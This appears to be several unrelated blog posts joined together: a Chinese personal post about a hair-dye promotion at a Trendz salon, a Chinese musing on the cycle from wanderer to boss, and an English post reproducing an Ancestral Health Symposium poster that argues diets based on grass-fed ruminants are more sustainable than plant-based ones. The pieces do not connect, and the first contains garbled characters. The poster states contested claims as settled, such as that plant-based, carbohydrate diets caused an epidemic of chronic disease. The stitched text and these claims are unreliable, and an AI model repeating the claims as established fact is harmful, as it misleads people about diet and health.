那天和yann去甲洞的Trendz染头发,刚好现在有Promotion RM180+FREE hair cut+FREE 2 hair treatment. 所以真的物超所值的,本来还挣扎要 E4��要剪头发因为我不愿意多给一笔,这个Promotion来的真是合时。 *请点名Patrick Pon- manager,我个人觉得他是我见过最满意的发型师了* 我这个很随便的人真的很随便,剪什么头发,染什么颜色我都没想过,只是很信任交给他,我给钱就是了。


效果出来,我不知道如何形容我头发,因为头顶就比较亮的颜色,好像灰色和青色,中间开始到发尾我看到是黑色叻。没讲不喜欢觉得蛮特别的,yann看了也说不知道可以怎样形容我的头发,so just let it be.
公开一张拍到不清的,因为用iphone front camera拍所以可能灯光不好。



等等我洗过几次头可能颜色会改变到时要是我没懒惰我会再放上来的。 :)
暂时这样。还剩4天....

Saturday, August 6, 2011

~生活的轮回~


这是我遇到的例子:

流浪汉/浪子:我想找份工作,做个踏实的~打工族~,就很好了。。。

打工族:能够成为~经理~是我的目标,有稳定的收入,又有成就感。。。

经理 :我有稳定的收入了,工资不错,又有一班好同事跟着我,但是,我生活真的很乏味,我要挑战自己做老板,做企业家。。。

老板,企业家:唉。。。每天都顾着赚钱,也不知道为了什么,真想把所有的东西放下,和心爱的人,父母,浪迹天涯,做个自由的~浪子~。。。。

没钱的浪子=没出息

有钱的浪子=潇洒

终结:如果能够用最短的时间把钱赚够,做个有钱的浪子是最终的目标。如果不能在短时间赚到足够的钱,请你注意身边有么 生意是可以让你带着心爱的伴侣,家人浪迹天涯的同时还有收入。。。把握身边的机会!!!不要太快说no。。。

Tuesday, August 2, 2011

The Big Picture

It’s almost time for the Ancestral Health Symposium. I’m looking forward to seeing friends, meeting lots of folks, and listening to so many of the people I’ve been learning from these past few years.  I’ll be presenting a poster on Saturday, August 6th. A marvelous way to celebrate my birthday!

The title of my poster is “Grass Based Health: The Big Picture.” My take-home point is that a human diet based on animal products – particularly those from ruminant animal – is far more “sustainable” than plant based diets.

As we consider this topic, we need to understand that our perception of “wilderness” and “nature” has been as distorted as our understanding of what constitutes a “healthy diet.” I find the following quote by D. F. Lott extremely helpful:
“When Lewis and Clark headed west … they were exploring not a wilderness but a vast pasture managed by and for Native Americans” (Lott, 2002). 

When Europeans first arrived in North America, they found anything but a primeval landscape. Instead, they encountered a land significantly altered by humans through the use of fire, sophisticated agricultural techniques, mining, and road and mound building (Mann, 2006).

“At the time of Columbus the Western Hemisphere had been thoroughly painted with the human brush. Agriculture occurred in as much as two-thirds of what is now the continental United States, with large swathes of the Southwest terraced and irrigated. Among the maize fields in the Midwest and Southeast, mounds by the thousand stippled the land. The forests of the eastern seaboard had been peeled back from the coasts, which were now lined with farms. Salmon nets stretched across almost every ocean-bound stream in the Northwest. And almost everywhere there was Indian fire.”


“The virgin forest was not encountered in the sixteenth and seventeenth centuries,” wrote historian Stephen Pyne, “it was invented in the late eighteenth and early nineteenth centuries.” Far from destroying pristine wilderness, that is, Europeans bloodily created it. (Mann, 2006)

With that background as introduction, here is the text from my poster.

Introduction:
Forage plants are those plants eaten by animals directly as pasture, crop residue, or immature cereal crops, those cut for fodder, and conserved for later use as hay or silage. These diverse crops vary widely in their adaptation and feed quality. They are typically low in fat, high in fiber, and not utilizable by humans.
Grass, clover, and forbes pasture. This plant material is high in moisture, crude
protein and fiber and low in fat. It's also not directly utilizable by humans.
While forage crops can be grown on ground incapable of producing feedstuffs that are utilizable by humans, greater yields can be achieved on better arable ground. These crops have limited economic value until converted into meat, milk, and fiber. Three quarters of the feed consumed by the United States’ beef cattle is forage.

The symbiotic relationship between the ruminant animal and the microbial population in the rumen permits these mammals to thrive on a low-fat, high-fiber diet. This production of high-quality protein and animal fat is the truly sustainable form of agriculture.
The ruminant and it's associated microbial population convert this
material that cannot sustain humans into products that can -
high quality protein and animal fat.
Aspects of sustainability:

Population: The archeological record and anthropological research demonstrates that the human diet was based upon animal products. Research confirms that the modern diet ought to be, too. The mistaken belief that the healthy diet is a plant-based one, one based upon carbohydrates, has produced an epidemic of chronic disease in the United States. The costs of this epidemic are unsustainable. Diets based upon animal products produce improvements in a wide variety of chronic diseases. These diets are more sustainable – people stay on them – as compared with low-fat and semi-starvation diets.
Grass-fed ribeye steaks. Grass-fed is NOT low fat!
Ecology: Grasslands, including sown pasture and rangeland, are among the largest ecosystems in the world. The proportion of the earth's land area covered by grasslands in 2000 was estimated at 3.5 billion hectares (8.6 billion acres), representing 26% of the world land area and 70% of the world agricultural area. There are 255 million hectares (630 million acres) of pasture, pastured woodland, pastured cropland and public grazing lands in the US. Less than 9 percent of the cropland is pasture.

Perennial forage crops increase soil organic matter,  fixing more carbon than woodland. Pasture crops reduce soil erosion, improving the infiltration of water into the soil profile and surface water quality. Without managed grazing or periodic burning, many grasslands will not remain grasslands. Ecological succession results in encroachment by woody, less productive species.
The following image is a close-up from the middle of this picture.
Grass grows naturally in a wide variety of sites, making it an
ideal crop. It's always better to work with nature!
Economic: Forage-based livestock production systems are fundamental to the global economy, and are more economically sustainable than annual cropping systems. Grasslands contribute to the livelihoods of more than 800 million people, worldwide. They are a source of food and forage, energy and wildlife habitat. The single greatest source of new wealth (the conversion of natural resource into a salable commodity) in the US is the conversion of grass into beef.
Pasture-based agriculture produces increased wealth while requiring fewer non-renewable inputs than annual crops. Biological nitrogen fixation by forage legumes and efficient nutrient cycling via the grazing animals’ dung and urine reduces fertilizer requirements. Managed grazing of adapted pasture mixes reduces pesticide use. These perennial crops require less tillage, cultivation, and harvest than annual crops, meaning less equipment is needed, and less petroleum used.

The key to farm sustainability is lowering the cost of production, rather than achieving maximum production. Well-managed pasture-based production systems are the means of achieving the lowest cost of production of animal products.

Achieving an acceptable profit at lower levels of production means more farmers can remain in business or begin production. More farmers means healthier rural communities.

Conclusion:
Our grasslands are not widely appreciated, nor are they close to achieving their potential. Important research and demonstration is needed, as well as adoption of suitable practices from other countries that have better developed grazing industries.

The adoption of diets based upon animal product instead of cereal products is the sustainable choice!



References:


Bureau of Land Management. 2011. Fact Sheet on the BLM’s Management of Livestock Grazing. Accessed July 19, 2011. 

Food and Agriculture Organization. 2008. Are grasslands under threat? Accessed July 21, 2011. 

Heath, M. E., R. F. Barnes, D. S. Metcalfe, eds. 1985. Forages: The Science of Grassland Agriculture. Iowa State University Press. Ames, Iowa.

Lott, D.F. 2002. American Bison: A Natural History. Berkeley, CA: University of California Press.

Mann, Charles C. 2006. 1491: New Revelations of the Americas before Columbus. New York: Vintage.

United States Department of Agriculture Economic Research Service. 2011. State Fact Sheets. Accessed July 18, 2011.